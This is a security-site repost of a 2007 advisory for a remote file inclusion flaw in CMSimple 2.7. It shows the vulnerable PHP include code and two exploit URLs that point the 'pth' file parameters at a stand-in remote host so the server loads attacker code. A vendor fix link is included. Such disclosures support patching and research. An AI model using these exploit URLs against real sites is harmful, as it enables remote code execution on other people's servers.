Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:mr alkomandoz <k3g_(at)_hackermail.com>
Date:24 января 2007 г.
Subject:cmsimple 2.7 Remote File Include

-----------------------------------------------

cmsimple 2.7  Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------

Vuln Code:

if (!@ include ($pth['file']['plugin_index']))
       


{if(@include($pth['file']['image']))exit;}




-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http:
//evil_scripts?


cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http:
//evil_scripts?

-----------------------------------------------

download:  http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa


SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team


                
##################################

AsB-MaY.NeT  & MoHaNdKo.CoM

##################################


--
_______________________________________________
Get your free email from http://www.hackermail.com

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 



Rating@Mail.ru